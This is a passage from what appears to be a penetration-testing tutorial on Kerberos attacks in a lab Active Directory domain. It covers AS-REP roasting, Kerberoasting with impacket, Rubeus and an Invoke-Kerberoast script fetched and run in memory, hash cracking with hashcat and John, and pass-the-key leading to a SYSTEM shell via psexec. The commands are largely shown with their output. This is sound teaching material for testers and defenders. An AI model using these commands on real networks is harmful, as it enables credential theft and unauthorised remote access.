<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d8fcb3aabaedb9abaabda8fceaebfcaebdb4b7bbb1aab9a8acb7aa98b2adaab9ababb1bbf6a8b9aab3">[email&#160;protected]</a>:BBEC05D876E5133F5AB0CEDA07572FE0$4A826CD2123EBC266179A9009E867EAAC03D1C8C9880ACF76DCA4B5919F967E86DBB6CD475DA8EF5C83B1B8388D22DA005BA10D5CB4D10F3C3F44C918ACD5843660C4FF5C678E635F7751A109524D693DB29BF75A5F0995B41CD35600B969FE371F77AD13F48604DFAB87253D324E8F53C267A2299D2450245D317D319A4FD424B42F815B79E2DD16C58AB2A2C106EB6995AFF70C8E889D8F170B35E78993157B3B3D13DCCE18A720BC5810C474CBC95C07B5FFCEE5EE06442FDB6244C33EECA4BFCD4F6C051A5F00C40A837A9644ADA70A381A85089F05CFB5E5F03AB0C7525BBA6AEAF9DA3554D3D700DD54760
</code></pre>
<p>Once executed, Rubeus should have generated a file with one AS_REP per line. This file can be used to feed Hashcat or John.</p>
<h4>Cracking the AS_REP</h4>
<p>Finally, to crack the harvested AS_REP messages, Hashcat or John can be used. In this case a dictionary attack will be performed, but a variety of cracking techniques can be applied.</p>
<p>Hashcat command:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="86f4e9e9f2c6ede7eaef">[email&#160;protected]</a>:impacket-examples# hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961/2961 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
Dictionary cache hit:
* Filename..: passwords_kerb.txt
* Passwords.: 3
* Bytes.....: 25
* Keyspace..: 3

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b490dfc6d681d5c7c6d1c490868790c2d1d8dbd7ddc6d5c4c0dbc6f4dec1c6d5c7c7ddd79ac4d5c6df">[email&#160;protected]</a>:bbec05d876e5133f5ab0ceda07572fe0$4a826cd2123ebc266179a9009e867eaac03d1c8c9880acf76dca4b5919f967e86dbb6cd475da8ef5c83b1b8388d22da005ba10d5cb4d10f3c3f44c918acd5843660c4ff5c678e635f7751a109524d693db29bf75a5f0995b41cd35600b969fe371f77ad13f48604dfab87253d324e8f53c267a2299d2450245d317d319a4fd424b42f815b79e2dd16c58ab2a2c106eb6995aff70c8e889d8f170b35e78993157b3b3d13dcce18a720bc5810c474cbc95c07b5ffcee5ee06442fdb6244c33eeca4bfcd4f6c051a5f00c40a837a9644ada70a381a85089f05cfb5e5f03ab0c7525bba6aeaf9da3554d3d700dd54760:Sm4rtSp33d
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="06226d74643367757463762234352270636a69656f746776726974466c73746775756f65287667746d">[email&#160;protected]</a>:bbec05d876...d54760
Time.Started.....: Tue Mar  5 11:15:47 2019 (1 sec)
Time.Estimated...: Tue Mar  5 11:15:48 2019 (0 secs)
Guess.Base.......: File (passwords_kerb.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        4 H/s (0.18ms) @ Accel:64 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3/3 (100.00%)
Rejected.........: 0/3 (0.00%)
Restore.Point....: 0/3 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: above1 -&gt; below1

Started: Tue Mar  5 11:12:26 2019
Stopped: Tue Mar  5 11:15:48 2019
</code></pre>
<p>John command:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="85f7eaeaf1c5eee4e9ec">[email&#160;protected]</a>:kali# john --wordlist=passwords_kerb.txt hashes.asreproast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidates left, minimum 16 needed for performance.
Sm4rtSp33d       (<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="381c534a5a0d594b4a5d481c4e5d54575b514a59484c574a78524d4a594b4b515b1648594a53">[email&#160;protected]</a>)
1g 0:00:00:00 DONE (2019-03-07 17:16) 20.00g/s 20.00p/s 20.00c/s 20.00C/s Sm4rtSp33d
Use the "--show" option to display all of the cracked passwords reliably
Session completed
</code></pre>
<p>In this case, luck is on our side, and the user password was contained in the dictionary.</p>
<h3>Kerberoasting</h3>
<p>The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</p>
<p>Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.</p>
<p>In order to retrieve user accounts which have associated services, the following LDAP filter can be used: <em>(&amp;(samAccountType=805306368)(servicePrincipalName=*))</em>. Parameter <em>samAccountType</em> allows filtering out the computer accounts, and <em>servicePrincipalName=*</em> filters by accounts with at least one service.</p>
<h4>From Linux</h4>
<p>From a Linux machine, it is possible retrieve all the TGS&#8217;s by using the impacket example <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" rel="nofollow">GetUserSPNs.py</a>. The command required to perform the attack and save the TGS&#8217;s into a file is the following:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="780a17170c3813191411">[email&#160;protected]</a>:impacket-examples# python GetUserSPNs.py jurassic.park/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name          MemberOf  PasswordLastSet      LastLogon           
--------------------  ------------  --------  -------------------  -------------------
cloner/labwws02       velociraptor            2019-02-27 17:12:12  2019-03-05 09:35:27 



<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6d1f0202192d060c0104">[email&#160;protected]</a>:impacket-examples# cat hashes.kerberoast 
$krb5tgs$23$*velociraptor$JURASSIC.PARK$cloner/labwws02*$b127187aceb93774a985bb1e528da85c$75cc3037a244f3422d6129bba79f79c67e79aca81b0b7dd551019424005abcfb8e232600fa968de2dcc9f10a44d13c17ac2be66bbb2640187dc174d81d9ebad0d691b36b3cbf4ca457678861748e2ab950f3066e0f50489415b934e4f6a2f2b7d8845cfd6a74279bad50da8c363174a07e51cbf39a2dd88bd74f1c839373cd9370ec1e2b7ebc5d6d05d49d34a75925d5983ab4849e211e57e93666f1fe9663b53620d2710e15f2c70837a4983db19c345b93f790244899b847d186197c37e966fc239ec750f91bd317fc2388ca421895052e2d57f742ab45c59275e95dfbb855ff11e5e893631164f6053ca0a6162c6b1be3ccdeb7fe2ce3a8634411b2b16ef03f558a5e0156bb8270ece6cf6b516af8172aa6071904d493c6fdf91738781371b68dfd9b4e1c2d6bcef3d665504194a703b08615d1b9c57ac794c37ab44dc2d57dff9677b0168aa7c078b190dddb2091ab63ca85868944cdbb4229a7a291028f193f94cb5c9a43c55b006cdd35df241b49d5464d3c05d5b7ec9eecd843335e45642892333b9760d06bc445d02558c2c30a2648a1018bc8493b8f73a6b0c07ffd052434239f0463b2344363656d6b6640efdc3e10fab04b99fc1f1487942c2b2c9ca7e89447aab3b1fb5adcb4b820d842a2ec713b788358e5c14d8ac3f0070058e6453297d4fb9538680ab152ce4ed3168cc6a58cc1c753b15d5de7fb98132ac3eec602ad611e8e03ed1c00c2bfa3b5bec1ea93f24b68b54fe48726f4e650dba34b3c4696b5f5e743cb5ace4b9b073dc718070d06e8f872abef2d4040350cd9e09091da47ab2fcef2e0d873afdcb9d7cf2236131f312d4e23004eb598efa064b871af82e618c31a2e82d28bc635ac3cbd000d725dd53217fb484178de3cd9bf4d20819c30c189ccc2ae349a333b628c6d41d01163b918def5ba089ac2cc6ff673dd64e1c2fef25fb599e009c1eca8e9e06cebc61fb0e7fc6922bc3edbdc60dd85a3f5b7412e8e46db80b55f577cc682892e66987a0e920872292a5cdd0f1a11fcc294461ccf86a53e75c9c8b0f9688919b4484986b7bcfb7612b117f98f5b0f4bf44ef0ad07245883ced1045b215a137d50a54f45a67168e6bed3dcb41f25b8ac307a4f3923d1545f0f6f1593db0a8b3032a3837b5c1715656e73c3ba0102e76dbbf47388bb5d1c334fc50598a57914a77c4c11059fe1b07b6342286ec2f6f38e7a5a946f40b7de01707f9681228904cb04434063c3dc7a6d26f301664514551ee20b69eb76d2a3f8fbc45b0d9cf9d236f8ac880c75b140dc471e6044b1c85af0e26393e057c5357f8ef223e845676e963eba6540d2cbee90cbb6d2422e9b1e34e6b2989a752c09b86d302219a45cd219f3fdf243f9b5c7002997daeff03f7cd437
</code></pre>
<p>Once finished, a file with a crackable TGS per line should have been generated as output. This file can be used to feed Hashcat or John in order to crack its TGS&#8217;s.</p>
<h4>From Windows</h4>
<p>Likewise, Kerberoasting can be performed from a Windows machine with several tools such as Rubeus or Invoke-Kerberoast from Empire project. In this case, tools are launched from the context of a logged user inside a domain workstation. The commands are the following:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: Kerberoasting

[*] SamAccountName         : velociraptor
[*] DistinguishedName      : CN=velociraptor,OU=Usuarios,DC=jurassic,DC=park
[*] ServicePrincipalName   : cloner/labwws02
[*] Hash written to C:\Users\triceratops\hashes.kerberoast

[*] Roasted hashes written to : C:\Users\triceratops\hashes.kerberoast

C:\Users\triceratops&gt;type hashes.kerberoast
$krb5tgs$23$*$jurassic.park$cloner/labwws02*$60B2E176B7A641FD663BF1B8D0B6E106$069B2ACA38B73BFCAC56526DBAEF743F4981980CD213DD9FE7D41D3AB3F3E521273C70D9CA681319F690C5BFAE627B423D3FBAD20D7EDE8E1AF930B5AEFCC2657B4A8B0BD5DCD9B51560E78478A9A7616C0CB675FDC501828CCE58206542D48D48B4A1DCE61BDCB9705094DE1D16536526E04E5AE84567407DA665868E33DB26CD763DCEBDD8F6801494A9F6E3ADE8F63C7D197D1AE66345A9635FE5E7C2D35A9DC4885DD2C6699CE8C00D71B518DC6BA8B87F525AEC635881245F20E7ECE150B4D4223C19960AFF417FB4C053EA6FA3B86938FCA1F1A781E3F36FAB9EE8909422CCE440453F0E3A2D23DED7861BA919BC8567C6DC1F77817F1E44181783EC3BA76CF688A841FBD6F9B02B2BD2D4A22BB489808F04CAAA87D025812EF11B39FEC605485EB875D57F4D09623B3108638816E6D2DB81F280635B29FD4BD08A9C8AAE72571B61E81274C56DCAB8AE13C2EEFA3AF2DD4084A96CA84F336987CD765C2D23FB957EE378136ED42BBFDE1DE8361BF933B51370D7AF07A3A939C3FEEC62ADC4A884EE52A296DEF9402F732D57F04FB93FC296B8F5031FA852403D6AE7211648693C4CD0C47847C07E869D1FB41B627B1928EC929409EEE0B1CE67BB55CEA069A26809E8347A3BEA34AB9EC4F78051D40CCD9AB1C5AF655165F86E0185B72E01643854710E322A2722BDEAABA317A1ECD78096E3D5A51831A57F505B861AEEB9B2207CA2D7FBCE47847C3D3A1CB9D5C2B931BC532B220434550D83A82F63B26B918E189C38D7D979AC05D34043ECEDCA09CEFDB3065A8BE2717E84FC325373A7B778AA4325D7F0458AC7A84196DA7752BEFE0ED9A0830ECB60BA4F3EC5F0A2FB3BA482DD9F947C8A667CCC54013C01D15E0AB41CC08A140389028461B16E38CCD85542F8B53E1AC4CB4E8F6CE2EFC9ECDABD6AED2716C17221791D620E333359B39A0D6720FD6167A2D03A74B4C7FD549EC9169AC3103A4EBD9BF8F5754EF013411802524A5F8DA6FE7FBCD219D2193891C9026513AEB751D6D3707253929F43F6A40012E2463002465F888E6F15C4CE264DB88650D503431A3D1FC58321ADB65F7BC69E2E95562A81FFE3A633BF4AC27B85CE2CB49A0EF19FDA1A51074B898D21B94FA91F7092BE9B22BDFBA09829FC1B95187AE8CB2BBAB3C1E3ECF5835723C2858862A0BEF32001AC461C0FE496029B3E7E6827E0991F6CF3F6D658F4AA8DDDDC097CC2B12038DF8112833DA052D0ED2D42D2FD93DA13FFEE3831F57956DFF6FA0C9E573862B1D4F2AC3344F7320F1FBCB5F9773EEE0F091829052CC5F31CECBD0E468914C70B9F03CA056A53E449AE85734B1C43D57FEEFC5576672C82D47F14A168E9A2FFDE715955B2749A01DE174CB32C4D8F7477A087E717379D9599E50997D8619D8F1F2DB268E5D89A9DA13E2B61C15E97159740766C4415B5F46C754A2C2C9500092BD1AF88F1C1C4D5DC4A4F5078F691148D448DBCD94549F74A2312921293427891DEF1C0754FA6AA3633141BE8D885703279C62EECE474A366FC9B8C8A4A5DAF98FF
</code></pre>
<p>Another way to accomplish Kerberoast is to use the powershell script <a href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" rel="nofollow">Invoke-Kerberoast</a> from <a href="https://github.com/EmpireProject/Empire" rel="nofollow">Empire</a> project, which can be loaded directly into memory:</p>
<pre><code class="language-shell">PS C:\Users\triceratops&gt; iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
PS C:\Users\triceratops&gt; Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
</code></pre>
<p>In the same way as impacket, these tools create output files with one crackable TGS per line, which can be used to feed Hashcat or John.</p>
<h4>Cracking the TGSs</h4>
<p>In this section, cracking examples of both Hashcat and John will be shown. However, there are several different cracking methods which can be applied in this situation. Next, a dictionary attack will be performed (the dictionary contains the password for demonstration purposes).</p>
<p>Hashcat command:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="63110c0c172308020f0a">[email&#160;protected]</a>:impacket-examples# hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961/2961 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
* Device #1: Kernel m13100_a0-pure.43809ab0.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: passwords_kerb.txt
* Passwords.: 3
* Bytes.....: 25
* Keyspace..: 3

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5tgs$23$*velociraptor$jurassic.park$cloner/labwws02*$60b2e176b7a641fd663bf1b8d0b6e106$069b2aca38b73bfcac56526dbaef743f4981980cd213dd9fe7d41d3ab3f3e521273c70d9ca681319f690c5bfae627b423d3fbad20d7ede8e1af930b5aefcc2657b4a8b0bd5dcd9b51560e78478a9a7616c0cb675fdc501828cce58206542d48d48b4a1dce61bdcb9705094de1d16536526e04e5ae84567407da665868e33db26cd763dcebdd8f6801494a9f6e3ade8f63c7d197d1ae66345a9635fe5e7c2d35a9dc4885dd2c6699ce8c00d71b518dc6ba8b87f525aec635881245f20e7ece150b4d4223c19960aff417fb4c053ea6fa3b86938fca1f1a781e3f36fab9ee8909422cce440453f0e3a2d23ded7861ba919bc8567c6dc1f77817f1e44181783ec3ba76cf688a841fbd6f9b02b2bd2d4a22bb489808f04caaa87d025812ef11b39fec605485eb875d57f4d09623b3108638816e6d2db81f280635b29fd4bd08a9c8aae72571b61e81274c56dcab8ae13c2eefa3af2dd4084a96ca84f336987cd765c2d23fb957ee378136ed42bbfde1de8361bf933b51370d7af07a3a939c3feec62adc4a884ee52a296def9402f732d57f04fb93fc296b8f5031fa852403d6ae7211648693c4cd0c47847c07e869d1fb41b627b1928ec929409eee0b1ce67bb55cea069a26809e8347a3bea34ab9ec4f78051d40ccd9ab1c5af655165f86e0185b72e01643854710e322a2722bdeaaba317a1ecd78096e3d5a51831a57f505b861aeeb9b2207ca2d7fbce47847c3d3a1cb9d5c2b931bc532b220434550d83a82f63b26b918e189c38d7d979ac05d34043ecedca09cefdb3065a8be2717e84fc325373a7b778aa4325d7f0458ac7a84196da7752befe0ed9a0830ecb60ba4f3ec5f0a2fb3ba482dd9f947c8a667ccc54013c01d15e0ab41cc08a140389028461b16e38ccd85542f8b53e1ac4cb4e8f6ce2efc9ecdabd6aed2716c17221791d620e333359b39a0d6720fd6167a2d03a74b4c7fd549ec9169ac3103a4ebd9bf8f5754ef013411802524a5f8da6fe7fbcd219d2193891c9026513aeb751d6d3707253929f43f6a40012e2463002465f888e6f15c4ce264db88650d503431a3d1fc58321adb65f7bc69e2e95562a81ffe3a633bf4ac27b85ce2cb49a0ef19fda1a51074b898d21b94fa91f7092be9b22bdfba09829fc1b95187ae8cb2bbab3c1e3ecf5835723c2858862a0bef32001ac461c0fe496029b3e7e6827e0991f6cf3f6d658f4aa8ddddc097cc2b12038df8112833da052d0ed2d42d2fd93da13ffee3831f57956dff6fa0c9e573862b1d4f2ac3344f7320f1fbcb5f9773eee0f091829052cc5f31cecbd0e468914c70b9f03ca056a53e449ae85734b1c43d57feefc5576672c82d47f14a168e9a2ffde715955b2749a01de174cb32c4d8f7477a087e717379d9599e50997d8619d8f1f2db268e5d89a9da13e2b61c15e97159740766c4415b5f46c754a2c2c9500092bd1af88f1c1c4d5dc4a4f5078f691148d448dbcd94549f74a2312921293427891def1c0754fa6aa3633141be8d885703279c62eece474a366fc9b8c8a4a5daf98ff:Sm4rtSp33d
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*velociraptor$jurassic.park$cloner/labw...af98ff
Time.Started.....: Tue Mar  5 10:46:34 2019 (1 sec)
Time.Estimated...: Tue Mar  5 10:46:35 2019 (0 secs)
Guess.Base.......: File (passwords_kerb.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        4 H/s (0.16ms) @ Accel:64 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3/3 (100.00%)
Rejected.........: 0/3 (0.00%)
Restore.Point....: 0/3 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: above1 -&gt; below1

Started: Tue Mar  5 10:42:51 2019
Stopped: Tue Mar  5 10:46:35 2019
</code></pre>
<p>Due to encoding while using hashcat, a problem raised. The tool displays an error similar to <em>Byte Order Mark (BOM) was detected</em>, due to an input file encoded with Unicode (which is common in Windows output files) instead of ASCII. In order to solve this issue, the tool <em>dos2unix</em> can be used to convert the file encoding to the correct one.</p>
<p>John command:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="10627f7f64507b717c79">[email&#160;protected]</a>:impacket-examples# john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sm4rtSp33d       (?)
1g 0:00:00:00 DONE (2019-03-05 10:53) 50.00g/s 150.0p/s 150.0c/s 150.0C/s above1..below1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
</code></pre>
<p>John was not able to show the username alongside the cracked password, instead, it displayed the symbol <em>(?)</em>. While this is enough in the case of just one TGS, it can get pretty annoying if several are going to be cracked.</p>
<p>After all, as shown above, it was possible to crack the password by using the correct dictionary with both tools.</p>
<h3>Overpass The Hash/Pass The Key (PTK)</h3>
<p>This attack aims to use user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.</p>
<p>In order to perform this attack, the NTLM hash (or password) of the target user account is needed. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to access any service or machine where the user account has permissions.</p>
<h4>From Linux</h4>
<p>From a Linux perspective, impacket can be used in order to perform this attack. Thus, the commands required for that purpose are the following:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a3d1ccccd7e3c8c2cfca">[email&#160;protected]</a>:impacket-examples# python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Saving ticket in velociraptor.ccache
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="acdec3c3d8ecc7cdc0c5">[email&#160;protected]</a>:impacket-examples# export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3f4d50504b7f545e5356">[email&#160;protected]</a>:impacket-examples# python psexec.py jurassic.park/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9ceaf9f0f3fff5eefdece8f3eedcf0fdfeebebefacaeb2f6e9eefdefeff5ffb2ecfdeef7">[email&#160;protected]</a> -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file yuiQeOUk.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service sBGq on labwws02.jurassic.park.....
[*] Starting service sBGq.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>After generating and using the TGT, finally a shell is launched. The requested TGT can also be used with other impacket examples with parameter <em>-k</em>, and even with other tools (as smbexec.py or wmiexec.py) thanks to it being written in a ccache file, which is a widely used format for Kerberos tickets in Linux.</p>
<p>At the moment of writing the examples for this article some problems arised:</p>
<ul>
<li><em>PyAsn1Error(&#8216;NamedTypes can cast only scalar values&#8217;,)</em> : Resolved by updating impacket to the lastest version.</li>
<li><em>KDC can&#8217;t found the name</em> : Resolved by using the hostname instead of the IP address, because it was not recognized by Kerberos KDC.</li>
</ul>
<h4>From Windows</h4>
<p>In order to accomplish this attack from a Windows machine, it is possible to use Rubeus and PsExec as follows:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 2a3de7fe356ee524cc9f3d579f2e0aa7
[*] Using domain controller: Lab-WDC02.jurassic.park (10.200.220.3)
[*] Building AS-REQ (w/ preauth) for: 'jurassic.park\velociraptor'
[*] Connecting to 10.200.220.3:88
[*] Sent 237 bytes
[*] Received 1455 bytes
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFSDCCBUSgAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAg
      oAMCAQKhGTAXGwZrcmJ0Z3QbDWp1cmFzc2ljLnBhcmujggQMMIIECKADAgESoQMCAQKiggP6BIID9nUy
      VTaRmuyCOYJ/Fz0Z5We4crR6qWrxpEPDZHV09VmBp0GYWwUxwGM4M2hkbFJss6i0RG1NvKUy55D2loPI
      nKXSD5kwEjJeMsVAQWvvQCNuIrVu/XY9eGhL405ryVYNELdPxOuBNXYYZoQYLo1qxcoEkH/ag4QTnG7z
      6qH1o5RWwhmqMHNWp77LGu3lBWd0lb3t7d3pfGCU7hgWRvA390dQZ+Vzrcqfs5sHzoii8ondT9LqyvYI
      4P6DwhXH1wWOVhF9Sf23wUSG5iIZvbTrHuNZvFcPmUYXF2zd0Dtx+L3ovYdWaw+7HDmu4NPspvuAlG2x
      Jj/cbGS1KuCjAtSkT9XMVu0WEFY8gIbew35l8t5H7b+8fcjTyOLFJyMIuEzTjdfzdGJ8NYsqAxG0wCtd
      w4OCuqUUHuffwD4L27PC+fVVR7D5htfy6MbWVQrVqfgGIhqdC68I5COjyknobf+ksO9EDcn8+7zDUXtE
      dbt9XZtt0VTNyZUfSyOMGW+pkpB8wA3QjzahpgrLVE/8oHGAkFQ6sf/DOr0CYinn7iC8lJ1zZj1hcDa6
      Y+RVSARW4V++03uQPwtCN6mpuhIumikFCQsOTMQky8QKcsFGHdsCqySQsAoOtdWLHpuYFnaA0VDb3M+i
      4yc5286jaF6NRRPBZJEZnSTCRNwhJCR3bgO3C5bzWKFCOFMjFy5GOCZoZdYIbKiVABG2ZFUuyMedCDQQ
      YJrLO6oFoCL5Yeu2vrviFZUSpbUVZlxSDHnASuo1PUCfnm7oF3E6aw6/Q/0/dONSQzImXC7H+t2Z7ym5
      4pIzkgIZ/p5ODWfKr/XrrBUjmPPDzGyRUz9q1NKPv0SVi8sC5wkWAe1tipU5G582PrBWuS+Nv9XLAoKL
      +LR4iWnUw3o3/96IyCiHiCGy/g1DLJehxb5/wxDxwrnpDW50kFs7bwFrbD+8qWwd8apZF/iiUyzRYJAu
      jDOTyfJtZ7Vm2mOwSm1KeUboZ3u9StIkNUbmjR/wXvwmvUCXDppO/LeMT9w5uejGNVr+QRLPL+brAkbB
      GHFoSTR0/L6k1+8vkJzAJCOA3Yir3JJd8xRdnad4Q7Pl67CjsGKrJddt6iBzoHKPabQ/SbDVIV4veMX7
      5KtcYHM8E2CvV2sV8KD1QIOSo00Ya/C/EUekjWsG3YGW7UulxDwb95mDRf6ntr7jMBC8G2jd49IuJcWR
      QTDFuys4L/NsEAqLo5RPNk6bz1SpjpWlmG95hRg5DAe1M+u8aRD6NDs3A8fH6b7fZkQ+1I/Xl5sBhfTt
      7FGbTI4mG+VlEHbJpl47KTAO+jJgYj3m0/vgcwBlO4lCMFucB3B488VEamPJU3M66hMOy6OB3TCB2qAD
      AgEAooHSBIHPfYHMMIHJoIHGMIHDMIHAoBswGaADAgEXoRIEEFg+Y8LhMIWpLiabLQKBdBihDxsNSlVS
      QVNTSUMuUEFSS6IZMBegAwIBAaEQMA4bDHZlbG9jaXJhcHRvcqMHAwUAQOEAAKURGA8yMDE5MDIyODEx
      NTc1N1qmERgPMjAxOTAyMjgyMTU3NTdapxEYDzIwMTkwMzA3MTE1NzU3WqgPGw1KVVJBU1NJQy5QQVJL
      qSIwIKADAgECoRkwFxsGa3JidGd0Gw1qdXJhc3NpYy5wYXJr

[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
